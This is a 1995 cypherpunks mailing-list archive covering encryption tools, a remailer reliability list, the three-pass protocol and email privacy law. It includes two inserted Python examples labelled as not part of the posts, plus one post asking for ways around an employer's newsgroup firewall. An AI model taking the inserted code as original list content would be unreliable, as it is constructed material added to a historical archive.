Message-ID: <2.2b7.32.19951218083043.0088d0c0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 PM 12/17/95 -0500, you wrote:
[Much noise on Perl-RSA tattoo and compile problems deleted]

The only thought that came to mind on this thread was how closely the tattoo
artist spellchecked that tattoo.  It would be pretty funny to have a
"munitions violation" that was non-functional due to tattooing errors.

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - R. Rococo |   Ignore the man     |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GLEN_MCBRIDE@BayNetworks.com (Glen McBride)
Date: Tue, 19 Dec 1995 08:45:26 +0800
To: cypherpunks@toad.com
Subject: Securing the end-points
Message-ID: <608235518.31497752@BayNetworks.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Greetings!
I was wondering if in addition to all the work and discussion regarding
crypto which generally centres around the transmission path information takes
traveling from end-point to end-point, there is any work being done to secure
the end-points themselves (i.e. files on your PC etc.)

In my view the end-points present the most vulnerability in the overall
message path from person to person. It is at these points that the
message/information exists as cleartext even if for a short period of time.
While of course it is possible to PGP encode your files is this a practical
way to go about securing your system? I am aware of RSA secure but is that
all there is out there?

Thanks in advance

Glen McBride
Bay Networks ASIA-PAC customer service 
Australia

Views are my own and do not represent those of my employer

===== CURRENT PGP KEY FOLLOWS =====







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Mon, 18 Dec 1995 17:12:40 +0800
To: cypherpunks@toad.com
Subject: Re: Secured RM ? (source)
In-Reply-To: <199512171048.VAA23204@sweeney.cs.monash.edu.au>
Message-ID: <Pine.A32.3.91.951218004301.41900A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 17 Dec 1995, Jiri Baum wrote:

> > In this particular case what I'm concerned about is a temporary cleartext
> > copy of a permanently encrypted document.  The cleartext only exists for
> > about 1-4 seconds, and then is deleted, so backups aren't really a
> > problem..
> 
> Is it then necessary to write it to disk?

I'm pretty sure that it's necessary.. at least at this point.  Basically
what I'm working on is a bit of front end that tries to make keeping things
encrypted a bit less of a hassle.  It needs to be able to read multiple
file types, and as such it does some odd things. It opens the file and
figures out the magic for it, closes it, then jumps to the right routine
for reading the particular thing.. the file is opened again, perhaps
once, perhaps repeatedly, depending on the nature of what is going on..
then when it finishes with the file the cleartext copy is removed.. the
main idea pushing me here is that if you were to encrypt things on your
hard drive for storage, you would most likely want access to them at some
point, and if you're like me, you'd want access to them on a regular basis.
Prior to starting work on this project I would manually decode whichever
file I needed, work with it, and then delete it. This was a pain in the
ass, and also somewhat less secure since I'm only human and could
conceivably forget to resecure the file after I'm done using it.  So
looking at it from a relaxed standpoint.. the code as it stands now is at
least as good as the previous method I was using, and is a lot simpler. :)
To be a bit more critical, neither method seems to be the BEST method..

I hate saying this 'cause it feels like a cop out, but I keep coming back to
the question of usability versus iron-clad security. At this point there
is no noticeable speed difference between using the program with encrypted
versus decrypted files. I'm pretty concerned about the overhead of getting
too involved in a flawless implementation. I think at this point if I
could produce a first release that would be "good enough" to pass (for
example) a moderately sophisticated once over by local law enforcement, I
would be content.  Once that's available I have a lot of other things that
I'd like to see done better..  Incidentally, I'm planning to post the
full details including an FTP site sometime in January or February.. at
that point I expect to be torn to shreds by the cryptographic community..

:) 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Mon, 18 Dec 1995 16:47:29 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: The Elevator Problem & Groucho's Duck
In-Reply-To: <199512160537.AAA23233@pipe6.nyc.pipeline.com>
Message-ID: <199512180803.DAA01695@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


tallpaul writes:
> At this point, this holiday season, I had an image of Merkle sitting by the
> tree putting an infinite number of prime numbers in an infinite number of
> boxes. (In the real world I've been fighting with my landlord and suddenly
> thought of Cantor's first description of the landlord's dilemma where a
> landlord has an infinite number of rooms, all full, when another guest
> shows up and wants a room.) 

:]

> At this point, I suddenly had an image of Cantor sitting on the floor next
> to Merkle. Merkle would pack an infinite number of boxes and hand each box
> to Cantor who would proceed to wrap each box in an infinite number of
> sheets of wrapping paper.
>
> Suddenly, I saw that my first suggested solution put all of the major work
> on Alice. She had to generate 10^6 prime pairs and send them all to Bob
> then brute force an average of (10^6)/2 attempts to discover the one pair
> Bob picked to factor.
>  
> This process *might* be speeded up if Bob would, Cantor-like, help out. In
> other words, have Alice generate and transmit 10^3 prime pairs and have Bob
> do the same. This cuts transmission time by 5*(10^5), a considerable
> savings. 

Mmm, didn't you just cut it in half (assuming simultaneous receive/transmit),
saving about 10^3 time ?  (I can't get through to the archives at the moment.)
Anyway, it's a nice improvement to the protocol.

> Then Alice and Bob each have to brute force an average of 5*(10^2) attempts
> to discover each others primes, for a similar savings.
>
> However, you still need a nonpatented algorithm that lets them use the four
> primes to encipher their message(s) while forcing the others on the
> elevator to factor an average of (10^3^2)/2 products instead of
> 2*((10^3)/2).
>
> This is still very far from a solution to the elevator problem as re-posed
> by Futplex but creates at least one way of *potentially* shortening the
> prime generation and transmission time issue he was kind enough to point
> out. 

I guess we should once again wish Roger Schlafly the best of luck in his
ongoing litigation. 

While we're on the subject, I've just noticed an interesting protocol in
Schneier, "invented by Shamir but never published", for communication over
an insecure channel without a shared secret ["Shamir's Three Pass Protocol" in
v.1,Sec.16.1,pp.376-377]. This protocol seems to have very appealing 
features, so I'm a little surprised that only the initial reference is given 
in Schneier. Using Shamir's proposed commutative symmetric cipher with it,
I suppose it's probably slower than DH for key exchange, and progress on the
discrete log problem would affect it just as much as RSA. Anyone have other
references offhand, or know any other reasons this protocol isn't so useful ?

-Futplex <futplex@pseudonym.com>
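Added example (not part of the post above): the three-pass exchange with modular exponentiation as the commutative cipher, showing each message on the wire, followed by the same exchange with XOR pads to show why the choice of commutative cipher matters. The modulus, the function names and the sample message are assumptions of this example.

```python
import math
import secrets

# Demo modulus: the Mersenne prime 2^521 - 1, picked only because it is easy
# to write down. It is an assumption of this example, not a recommendation.
P = 2**521 - 1


def keypair(p=P):
    """Secret exponent e coprime to p-1 and its inverse d, so (m^e)^d = m mod p."""
    while True:
        e = secrets.randbelow(p - 3) + 2              # 2 <= e <= p-2
        if math.gcd(e, p - 1) == 1:
            return e, pow(e, -1, p - 1)


def three_pass(message, p=P):
    """Run the exchange. Returns (wire transcript, plaintext Bob recovers).

    The message must not start with a zero byte, since it travels as an integer.
    """
    m = int.from_bytes(message, "big")
    if not 1 < m < p:
        raise ValueError("message must encode to an integer in (1, p)")
    a_enc, a_dec = keypair(p)          # Alice's secret pair, never sent
    b_enc, b_dec = keypair(p)          # Bob's secret pair, never sent
    c1 = pow(m, a_enc, p)              # pass 1, Alice -> Bob:  m^a
    c2 = pow(c1, b_enc, p)             # pass 2, Bob -> Alice:  m^(ab)
    c3 = pow(c2, a_dec, p)             # pass 3, Alice -> Bob:  m^b
    recovered = pow(c3, b_dec, p)      # Bob removes his own exponent
    size = (recovered.bit_length() + 7) // 8
    return (c1, c2, c3), recovered.to_bytes(size, "big")


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def three_pass_xor(message):
    """Same three passes with one-time pads as the 'commutative cipher'."""
    ka = secrets.token_bytes(len(message))
    kb = secrets.token_bytes(len(message))
    c1 = xor(message, ka)              # pass 1: m ^ ka
    c2 = xor(c1, kb)                   # pass 2: m ^ ka ^ kb
    c3 = xor(c2, ka)                   # pass 3: m ^ kb
    return (c1, c2, c3), xor(c3, kb)


def passive_listener_xor(transcript):
    """What a wiretap learns from the XOR variant: c1 ^ c2 ^ c3 is the message."""
    c1, c2, c3 = transcript
    return xor(xor(c1, c2), c3)


if __name__ == "__main__":
    msg = b"constructed sample session key"
    wire, got = three_pass(msg)
    print("modexp variant, Bob recovers:", got)
    wire_x, got_x = three_pass_xor(msg)
    print("xor variant, Bob recovers:   ", got_x)
    print("xor variant, wiretap learns: ", passive_listener_xor(wire_x))
```

With exponentiation the listener sees m^a, m^(ab) and m^b and is left with a discrete log problem; with XOR the three passes cancel to the plaintext. The exchange also has no authentication, so it needs an authenticated channel around it.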




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 18 Dec 1995 19:02:53 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Campaign Finance Reform
In-Reply-To: <m0tRZDX-0008ycC@pacifier.com>
Message-ID: <Pine.SUN.3.91.951218031739.17673A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, jim bell wrote:

> >>It occurs to me that it would be a major advance if a system could be set up
> >>that would "blind" campaign donations as to their source:  The donor could
> >>be satisfied that his donation gets to the candidate or cause, but the
> >>candidate couldn't know  who actually paid the money (and the donor would be
> >>unable to prove that he made a donation, for example).  Admittedly there are
> >>a lot of details that need to be worked out, but if this could be
> >>accomplished it would change politics as we know it.
> >
> >If you'll give it some more thought, Jim, you'll see that it has a loophole
> >in it you could drive a semi through. There is no way to keep a donor from
> >passing the word to the recipient. No matter how you work out the details,
> >it's impossible to keep the information from passing. It could never work.
> 
> It is absolutely true that you couldn't stop a person from communicating
> claims of a donation to a politician.   But what you COULD do is to ensure
> that the donor couldn't PROVE that he made such a donation.  In other words,
> _I_ could claim that I gave $1K to Senator Sludgepump (a lie) and the good
> senator would have no idea that I wasn't telling the truth.  The people who
> REALLY made such donations would be helpless.

A tricky way around this, if it's done ALMOST properly, is to donate in 
odd amounts... i.e. "Senator Sludgepump, I am going to donate $469.23 to
your campaign..."

All this means is that the donations would have to be lumped in some way 
so that Senator Sludgepump can't find out the exact amounts donated by 
any individual.

ObCrypto: Donating a specific amount of money could be considered a 
covert channel.
 
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 18 Dec 1995 14:01:25 +0800
To: cypherpunks@toad.com
Subject: Re: Encrypted telnet...
Message-ID: <199512180438.XAA08244@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Dec 95 12:48:41 CST, you wrote:

An alternative to writing an entirely new proggie might be to write an
add-on DLL for Windoze telnet clients that support add-ons... EWAN
comes to mind here.


>I am looking for an encrypted telnet (or rlogin/etc) package
>that supports a Windoze client.  

>It looks like all the normal ones that I can find 
>(SSH, SRA telnet, SSLtelnet, etc) are just under Unixoids.  
>Don't get me wrong - I would prefer to use Unix, but I am
>headed off to locations, where I know all I'll have access to 
>is Windows, with a PPP stack to some ISP.

>I'd write it myself, - pasting different packages together,
>but I need it working in a day or two.  Can anyone help me here?


>Thanks,
>Dan
>------------------------------------------------------------------
>Dan Oelke                                  Alcatel Network Systems
>droelke@aud.alcatel.com                             Richardson, TX







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 18 Dec 1995 23:53:20 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199512181450.GAA18890@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reorder";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Over the past few weeks, the remailer-list has been showing somewhat
poor performance of the remailers. Well, most of the problem was my
fault, rather than that of the remailers. I had managed to turn off
suid on my sendmail binary, with bad results. It's fixed now.

Last update: Mon 18 Dec 95 6:49:26 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
mix      mixmaster@remail.obscura.com     __...-++-+++  9:56:07  99.98%
hacktic  remailer@utopia.hacktic.nl        *********+*     7:46  99.94%
ecafe    cpunk@remail.ecafe.org           #-##_#--####    49:58  99.92%
c2       remail@c2.org                    + ++-.--++++  1:27:22  99.91%
flame    remailer@flame.alias.net          *********+*    12:10  99.85%
amnesia  amnesia@chardos.connix.com       +--+-------   2:55:50  99.84%
portal   hfinney@shell.portal.com         ####*# .#**+    54:51  99.80%
replay   remailer@replay.com              ** ********#    24:11  99.80%
bsu-cs   nowhere@bsu-cs.bsu.edu             #_##.#*#-#    50:50  99.64%
rmadillo remailer@armadillo.com           + +++++++ ++    39:23  99.55%
vishnu   mixmaster@vishnu.alias.net           #-*#*++*    20:25  99.40%
alumni   hal@alumni.caltech.edu             #_*_.-+*++  1:00:21  99.37%
ford     remailer@bi-node.zerberus.de     .--._._.-+++ 14:08:00  99.24%
spook    remailer@valhalla.phoenix.net    **** - * *+*    22:56  99.10%
hroller  hroller@c2.org                   ## -...-##+#    44:42  98.83%
wmono    wmono@valhalla.phoenix.net       *  *  .* *+*    16:13  98.72%
penet    anon@anon.penet.fi               _--_--__..   31:02:40  98.56%
shinobi  remailer@shinobi.alias.net       - -_- +++--     52:27  96.76%
extropia remail@extropia.wimsey.com       .----_.-.-   13:31:30  94.19%
rahul    homer@rahul.net                  +**+*_.*#++#  1:18:24  99.92%
gondolin mix@remail.gondolin.org          -_.------     8:23:37  79.17%
robo     robo@c2.org                      #         *#     3:38  57.61%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
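
An added example, not part of Raph Levien's message or of the software that generates his list: a Python parser for the table rows and history key above, used to shortlist remailers by uptime, average latency, and share of late responses. It assumes a two-field latency is minutes:seconds and that a blank in the history column means no measurement; the function names and thresholds are illustrative.

```python
import re
from dataclasses import dataclass

# Rows excerpted from the list above, embedded so the example runs offline.
SAMPLE = """\
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
mix      mixmaster@remail.obscura.com     __...-++-+++  9:56:07  99.98%
hacktic  remailer@utopia.hacktic.nl        *********+*     7:46  99.94%
c2       remail@c2.org                    + ++-.--++++  1:27:22  99.91%
replay   remailer@replay.com              ** ********#    24:11  99.80%
penet    anon@anon.penet.fi               _--_--__..   31:02:40  98.56%
robo     robo@c2.org                      #         *#     3:38  57.61%
"""

# Upper bound in seconds for each history symbol, per the "History key".
# None means the key gives no finite bound (more than a day, or too late).
HISTORY_KEY = {
    "#": 5 * 60,
    "*": 60 * 60,
    "+": 4 * 3600,
    "-": 24 * 3600,
    ".": None,
    "_": None,
}

# name, address, history (may contain blanks), latency, uptime percentage.
ROW = re.compile(
    r"^(\S+)\s+(\S+@\S+)\s+([#*+\-._ ]*?)\s+(\d+(?::\d\d){1,2})\s+(\d+\.\d+)%\s*$"
)


@dataclass
class Remailer:
    name: str
    address: str
    history: str      # raw history column, oldest ping first
    latency_s: int    # average latency in seconds
    uptime: float     # percent


def latency_seconds(text):
    """Convert 'h:mm:ss' or 'm:ss' (assumed minutes:seconds) to seconds."""
    total = 0
    for part in text.split(":"):
        total = total * 60 + int(part)
    return total


def parse_list(text):
    """Parse table rows; header, rule and prose lines are skipped."""
    out = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            name, addr, hist, lat, up = m.groups()
            out.append(Remailer(name, addr, hist, latency_seconds(lat), float(up)))
    return out


def slow_fraction(r):
    """Share of recorded pings that took more than a day or came back too late."""
    pings = [c for c in r.history if c in HISTORY_KEY]
    if not pings:
        return 1.0  # no measurements: treat as unproven rather than reliable
    return sum(1 for c in pings if HISTORY_KEY[c] is None) / len(pings)


def select(remailers, min_uptime=99.0, max_latency_s=3600, max_slow=0.1):
    """Shortlist remailers meeting all three thresholds, best uptime first."""
    ok = [
        r for r in remailers
        if r.uptime >= min_uptime
        and r.latency_s <= max_latency_s
        and slow_fraction(r) <= max_slow
    ]
    return sorted(ok, key=lambda r: r.uptime, reverse=True)


if __name__ == "__main__":
    for r in select(parse_list(SAMPLE)):
        print(f"{r.name:8} {r.address:32} {r.latency_s:6d}s {r.uptime:.2f}%")
```
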




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org (Dan Bailey)
Date: Mon, 18 Dec 1995 23:29:46 +0800
To: stewarts@ix.netcom.com
Subject: Re: Motorola Secure Phone
Message-ID: <199512181337.NAA28013@pop01.ny.us.ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995 17:38:49 -0800 you wrote:

>At 06:40 PM 12/15/95 EST, you wrote:
>>
>
>I don't know Moto's phone models, but there are some cordless phones,
>especially long-range 900MHz ones, that are "secure" because of
>spread-spectrum, and others that call themselves "secure" because
>they're "digital", so you can't eavesdrop on them just by playing
>with a scanner and maybe single-sideband.  Sigh.
>
Well, just to finish the story, I ended up getting the Cincinnati
Microwave Escort 9000 (yes, the radar detector people).  It's 900 MHz
digital spread-spectrum, although it's still unclear how secure their
implementation is.  I'll call them and see what I can come up
with....I realize it's *not* going to give me military-style security.
 But really all I'm interested in is making it simpler (ie cheaper)
for Big Brother to wiretap me than to deal with trying to scan me
without court authorization.
					Dan
***************************************************************
#define private public						dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
***************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 18 Dec 1995 23:31:28 +0800
To: cypherpunks@toad.com
Subject: GIA_nts
Message-ID: <199512181341.IAA28130@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-18-95. NYPaper:

   "Telecommunications Giants Join Internet Security Quest."

      The consortium seeks to establish a layer of software
      and hardware standards that would effectively rest atop
      the Internet. Their goal is to make the Internet more
      secure, reliable and easy to use. The consortium started
      meeting last summer, and had seven core members: AT&T,
      Deutsche Telekom, Lotus, Novell, NTT, the Telstra
      Corporation and Unisource. The group held private 
      meetings from Dec. 6 through Dec. 9 in New York, 
      attended by 24 phone carriers and 14 computer companies, 
      including Intel, Microsoft, Sun and the Hewlett-Packard. 


   "The prospect of Internet censorship raises troubling
   issues for business." Denise Caruso's column.

      While most of the outcry has raised valid concerns about
      the First Amendment and civil liberties, little of the
      discussion has focused on how censorship could cripple
      much of the Internet's commercial potential. "This
      proposal will have more than a chilling effect," Ms.
      Fulton said. "It may well mean a cold death for everyone
      except very rich and very cautious media companies."


   GIA_nts  (11 kb)











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Huddleston <reh@wam.umd.edu>
Date: Tue, 19 Dec 1995 03:31:20 +0800
To: vznuri@netcom.com
Subject: Re: Political Cleanup program
Message-ID: <199512181412.JAA08672@exp2.wam.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


Detweiler wrote:
* >JB:
* >>Politics is traditionally corrupt, it appears, because donors to politicians
* >>and political campaigns expect a quid pro quo for their donations.  Various
* >>unsatisfactory solutions include campaign spending limits, etc.
* >
* >I have an unusual view that I've never seen elsewhere: the problem with
* >our government is not that money or PACs are involved, but that the system
* >does not handle or resolve the conflicts between them very well. in other
* >words, in contrary to the current view that all PACs are evil, I think the
* >problem is not that we have PACs, but that our current system does not
* >balance their demands in some sensible manner.  the system is
* >susceptible to corruption. it is conceivable however that there would be
* >a system that involves money and politics but still avoids corruption.

Not to sound like a dupe or anything, but every time I get discouraged
at the rampant mealyism of our political system I go read the first
couple of paragraphs of a text from GOVT 101.  There, I get reminded that
the way most political debate is handled elsewhere is with bullets.

Personally, I welcome a complete equity between all lobbyists seeking to
obtain a politico's ear.  Take the money out of the equation, and let the
merits of their causes, if any, stand on their own. 

Happy holidays,

Richard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Klur" <dklur@dttus.com>
Date: Tue, 19 Dec 1995 05:13:06 +0800
To: cypherpunks@toad.com
Subject: redirect of newsgroups
Message-ID: <9511188193.AA819305757@cc2.dttus.com>
MIME-Version: 1.0
Content-Type: text/plain


     
     For those of us sitting behind a firewall that blocks out all of the 
     alt, rec, etc.. newsgroups...is there another way to access these 
     groups?  For example, redirecting the contents of alt.2600 to, say, 
     comp.2600 (because this firewall allows the comp.xxx groups through).  
     Or any other hacks around this inconvenience?
     
     -----BEGIN PBP SIGNATURE-----
     Version: 1.0.0, Copyright 1995, Pretty Bad Privacy

     David Klur 
     dklur@dttus.com

     I am who I am because I say so.  So there.
     -----END PBP SIGNATURE-------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Carl M. Kadie" <kadie@eff.org>
Date: Tue, 19 Dec 1995 04:23:33 +0800
To: cypherpunks@toad.com
Subject: Oklahoma University: Is this legal?...
In-Reply-To: <Pine.SUN.3.91.951217011017.25860A-100000@eff.org>
Message-ID: <199512181751.JAA07443@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


No state law does or could preempt the 5th Amendment, the ECPA, or the
FERPA. Moreover, the one state FOIA (Illinois') I've read in detail
*doesn't* even try to do this.

I'm enclosing two FAQ's. The first is about email privacy. The second
is about student media.

I also suggest sending email to marsha-w@uiuc.edu (Marsha Woodbury);
she is an expert in the application of FOIA laws to universities
and a CPSR officer.

- Carl
Carl Kadie -- I do not represent EFF or my employer; this is just me.
 =Email: kadie@eff.org, kadie@cs.uiuc.edu =
 =URL: <http://www.eff.org/CAF/>, <ftp://ftp.cs.uiuc.edu/pub/kadie/> =


=============== ftp://ftp.eff.org/pub/CAF/faq/email.privacy ===============
q: Can (should) my university monitor my email?

a: Ethically (and perhaps legally) email communications should have
the same privacy protection as telephone calls. It would be unwise for
any university employee to tap email communications without
authorization from the university president, university legal counsel,
and the academic freedom committee. According to Mike Godwin, legal
services counsel for the Electronic Frontier Foundation (EFF), the
U.S.'s Electronic Communications Privacy Act (ECPA) could be
reasonably construed to protect university email. This is also the
reported opinion of the U. of Michigan's lawyers. Also, the U.S.'s
Family Educational Rights and Privacy Act gives students at all public
and most private schools some privacy rights.

A U.S. government task force says that "[Email] monitoring [of
government employees] of actual communications and communicators may
impinge on the Constitutional rights of freedom of speech (1st
Amendment), against unreasonable search and seizure (4th Amendment),
and against self-incrimination (5th amendment), as well as on the
right to privacy, specifically as set forth in both the Privacy Act
and the ECPA."

In the context of libraries, the American Library Association's Policy
on Confidentiality of Library Records suggests this procedure to deal
with an official or police request for information about users:

'When drafting local policies, libraries should consult with their
legal counsel to insure these policies are based upon and
consistent with applicable federal, state, and local law
concerning the confidentiality of library records, the disclosure
of public records, and the protection of individual privacy.

Suggested procedures include the following:

     1.  The library staff member receiving the request to
         examine or obtain information relating to circulation or
         other records identifying the names of library users,
         will immediately refer the person making the request to
         the responsible officer of the institution, who shall
         explain the confidentiality policy.

     2.  The director, upon receipt of such process, order, or
         subpoena, shall consult with the appropriate legal
         officer assigned to the institution to determine if such
         process, order, or subpoena is in good form and if there
         is a showing of good cause for its issuance.

     3.  If the process, order, or subpoena is not in proper form
         or if good cause has not been shown, insistence shall be
         made that such defects be cured before any records are
         released. (The legal process requiring the production
         of circulation or other library records shall ordinarily
         be in the form of subpoena "duces tecum" [bring your
         records] requiring the responsible officer to attend
         court or the taking of his/her deposition and may
         require him/her to bring along certain designated
         circulation or other specified records.)

     4.  Any threats or unauthorized demands (i.e., those not
         supported by a process, order, or subpoena) concerning
         circulation and other records identifying the names of
         library users shall be reported to the appropriate legal
         officer of the institution.

     5.  Any problems relating to the privacy of circulation and
         other records identifying the names of library users
         which are not provided for above shall be referred to
         the responsible officer.'



- Carl M. Kadie

ANNOTATED REFERENCES

(All these documents are available on-line. Access information follows.)

=================<a href="ftp://ftp.eff.org/pub/CAF/law/ecpa.1986.godwin">
law/ecpa.1986.godwin
=================</a>
* Privacy -- E-mail -- ECPA - University Site

Mike Godwin, legal services counsel for the Electronic Frontier
Foundation (EFF), says that the Electronic Communications Privacy Act
(ECPA) could be reasonably construed to protect university email.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/ferpa.text">
law/ferpa.text
=================</a>
* Privacy -- Students -- FERPA (Buckley Amendment)

The full text of the Family Educational Right to Privacy Act
(Buckley Amendment).

=================<a href="http://www.eff.org/CAF/faq/email.policies.html">
faq/email.policies
=================</a>
* Email -- Policies
 
q: Do any universities treat email and computer files as private?
 
a: Yes, many universities treat email and computer files as private.
...

=================<a href="ftp://ftp.eff.org/pub/CAF/library/confidentiality.1.ala">
library/confidentiality.1.ala
=================</a>
* Confidentiality -- 1 (ALA)

The American Library Association's "Policy on Confidentiality of
Library Records"

Suggests how to handle police or official requests for information
about a user.

=================<a href="ftp://ftp.eff.org/pub/CAF/library/computer.draft.ala">
library/computer.draft.ala
=================</a>
* DRAFT: Access to Electronic ... Services and Networks ... (ALA)

A draft interpretation by the American Library Association of the
"Library Bill of Rights"

Says in part: "Libraries and librarians exist to facilitate [freedom
of speech and freedom to read] by providing access to, identifying,
retrieving, organizing, and preserving recorded expression regardless
of the formats or technologies in which that expression is recorded."

=================<a href="ftp://ftp.eff.org/pub/CAF/statements/bill-of-rights.aahe">
statements/bill-of-rights.aahe
=================</a>
